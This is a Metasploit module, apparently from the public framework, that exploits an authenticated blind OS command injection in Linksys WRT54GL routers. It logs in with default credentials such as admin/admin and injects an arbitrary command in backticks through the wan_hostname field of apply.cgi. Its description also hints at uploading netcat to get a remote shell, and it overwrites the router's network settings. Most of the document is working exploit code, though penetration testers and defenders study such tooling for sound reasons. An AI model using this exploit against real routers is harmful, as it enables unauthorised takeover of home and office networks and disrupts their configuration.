1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8

9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name' => 'Linksys WRT54GL Remote Command Execution',
14
        'Description' => %q{
15
          Some Linksys Routers are vulnerable to OS Command injection.
16
          You will need credentials to the web interface to access the vulnerable part
17
          of the application.
18
          Default credentials are always a good starting point. admin/admin or admin
19
          and blank password could be a first try.
20
          Note: This is a blind OS command injection vulnerability. This means that
21
          you will not see any output of your command. Try a ping command to your
22
          local system and observe the packets with tcpdump (or equivalent) for a first test.
23

24
          Hint: To get a remote shell you could upload a netcat binary and exec it.
25
          WARNING: this module will overwrite network and DHCP configuration.
26
        },
27
        'Author' => [ 'Michael Messner <devnull[at]s3cur1ty.de>' ],
28
        'License' => MSF_LICENSE,
29
        'References' => [
30
          [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-01' ],
31
          [ 'URL', 'http://www.s3cur1ty.de/attacking-linksys-wrt54gl' ],
32
          [ 'EDB', '24202' ],
33
          [ 'BID', '57459' ],
34
          [ 'OSVDB', '89421' ]
35
        ],
36
        'DisclosureDate' => '2013-01-18',
37
        'Notes' => {
38
          'Stability' => [CRASH_SAFE],
39
          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
40
          'Reliability' => []
41
        }
42
      )
43
    )
44

45
    register_options(
46
      [
47
        Opt::RPORT(80),
48
        OptString.new('TARGETURI', [ true, 'PATH to OS Command Injection', '/apply.cgi']),
49
        OptString.new('HttpUsername', [ true, 'User to login with', 'admin']),
50
        OptString.new('HttpPassword', [ false, 'Password to login with', 'password']),
51
        OptString.new('CMD', [ true, 'The command to execute', 'ping 127.0.0.1']),
52
        OptString.new('NETMASK', [ false, 'LAN Netmask of the router', '255.255.255.0']),
53
        OptAddress.new('LANIP', [ false, 'LAN IP address of the router (default is RHOST)']),
54
        OptString.new('ROUTER_NAME', [ false, 'Name of the router', 'cisco']),
55
        OptString.new('WAN_DOMAIN', [ false, 'WAN Domain Name', 'test']),
56
        OptString.new('WAN_MTU', [ false, 'WAN MTU', '1500'])
57
      ]
58
    )
59
  end
60

61
  # If the user configured LANIP, use it. Otherwise, use RHOST.
62
  # NB: This presumes a dotted quad ip address.
63
  def lan_ip
64
    if datastore['LANIP'].to_s.empty?
65
      datastore['RHOST']
66
    else
67
      datastore['LANIP']
68
    end
69
  end
70

71
  def run
72
    # setting up some basic variables
73
    uri = datastore['TARGETURI']
74
    user = datastore['HttpUsername']
75
    rhost = datastore['RHOST']
76
    netmask = datastore['NETMASK']
77
    routername = datastore['ROUTER_NAME']
78
    wandomain = datastore['WAN_DOMAIN']
79
    wanmtu = datastore['WAN_MTU']
80

81
    ip = lan_ip.split('.')
82

83
    if datastore['HttpPassword'].nil?
84
      pass = ''
85
    else
86
      pass = datastore['HttpPassword']
87
    end
88

89
    print_status("Trying to login with #{user} / #{pass}")
90

91
    begin
92
      res = send_request_cgi({
93
        'uri'	=> uri,
94
        'method' => 'GET',
95
        'authorization' => basic_auth(user, pass)
96
      })
97

98
      unless (res.is_a? Rex::Proto::Http::Response)
99
        vprint_error("#{rhost} not responding")
100
        return :abort
101
      end
102

103
      if (res.code == 404)
104
        print_error('Not Found page returned')
105
        return :abort
106
      end
107

108
      if [200, 301, 302].include?(res.code)
109
        print_good("SUCCESSFUL LOGIN. '#{user}' : '#{pass}'")
110
      else
111
        print_error("NO SUCCESSFUL LOGIN POSSIBLE. '#{user}' : '#{pass}'")
112
        return :abort
113
      end
114
    rescue ::Rex::ConnectionError
115
      vprint_error("#{rhost} - Failed to connect to the web server")
116
      return :abort
117
    end
118

119
    cmd = datastore['CMD']
120

121
    print_status('Sending remote command: ' + cmd)
122

123
    # cmd = Rex::Text.uri_encode(datastore['CMD'])
124
    # original Post Request:
125
    # data_cmd = "submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&"
126
    # data_cmd << "lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=#{routername}&"
127
    # data_cmd << "wan_hostname=`#{cmd}`&wan_domain=#{wandomain}&mtu_enable=1&wan_mtu=#{wanmtu}&lan_ipaddr_0=#{ip[0]}&"
128
    # data_cmd << "lan_ipaddr_1=#{ip[1]}&lan_ipaddr_2=#{ip[2]}&lan_ipaddr_3=#{ip[3]}&lan_netmask=#{netmask}&"
129
    # data_cmd << "lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&"
130
    # data_cmd << "wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&"
131
    # data_cmd << "wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&"
132
    # data_cmd << "wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1"
133

134
    vprint_status("using the following target URL: #{uri}")
135

136
    begin
137
      res = send_request_cgi({
138
        'uri'	=> uri,
139
        'method' => 'POST',
140
        'authorization' => basic_auth(user, pass),
141
        # 'data' => data_cmd,
142

143
        'vars_post' => {
144
          'submit_button' => 'index',
145
          'change_action' => '1',
146
          'submit_type' => '1',
147
          'action' => 'Apply',
148
          'now_proto' => 'dhcp',
149
          'daylight_time' => '1',
150
          'lan_ipaddr' => '4',
151
          'wait_time' => '0',
152
          'need_reboot' => '0',
153
          'ui_language' => 'de',
154
          'wan_proto' => 'dhcp',
155
          'router_name' => routername.to_s,
156
          'wan_hostname' => "`#{cmd}`",
157
          'wan_domain' => wandomain.to_s,
158
          'mtu_enable' => '1',
159
          'wan_mtu' => wanmtu.to_s,
160
          'lan_ipaddr_0' => ip[0].to_s,
161
          'lan_ipaddr_1' => ip[1].to_s,
162
          'lan_ipaddr_2' => ip[2].to_s,
163
          'lan_ipaddr_3' => ip[3].to_s,
164
          'lan_netmask' => netmask.to_s,
165
          'lan_proto' => 'dhcp',
166
          'dhcp_check' => '1',
167
          'dhcp_start' => '100',
168
          'dhcp_num' => '50',
169
          'dhcp_lease' => '0',
170
          'wan_dns' => '4',
171
          'wan_dns0_0' => '0',
172
          'wan_dns0_1' => '0',
173
          'wan_dns0_2' => '0',
174
          'wan_dns0_3' => '0',
175
          'wan_dns1_0' => '0',
176
          'wan_dns1_1' => '0',
177
          'wan_dns1_2' => '0',
178
          'wan_dns1_3' => '0',
179
          'wan_dns2_0' => '0',
180
          'wan_dns2_1' => '0',
181
          'wan_dns2_2' => '0',
182
          'wan_dns2_3' => '0',
183
          'wan_wins' => '4',
184
          'wan_wins_0' => '0',
185
          'wan_wins_1' => '0',
186
          'wan_wins_2' => '0',
187
          'wan_wins_3' => '0',
188
          'time_zone' => '-08+1+1',
189
          '_daylight_time' => '1'
190
        }
191
      })
192
    rescue ::Rex::ConnectionError
193
      vprint_error("#{rhost} - Failed to connect to the web server")
194
      return :abort
195
    end
196

197
    if res && (res.code == 200)
198
      print_status('Blind Exploitation - Response expected')
199
    else
200
      print_error("Blind Exploitation - Response don't expected")
201
    end
202
    print_status('Blind Exploitation - wait around 10 seconds until the configuration gets applied and your command gets executed')
203
    print_status('Blind Exploitation - unknown Exploitation state')
204
  end
205
end
206

207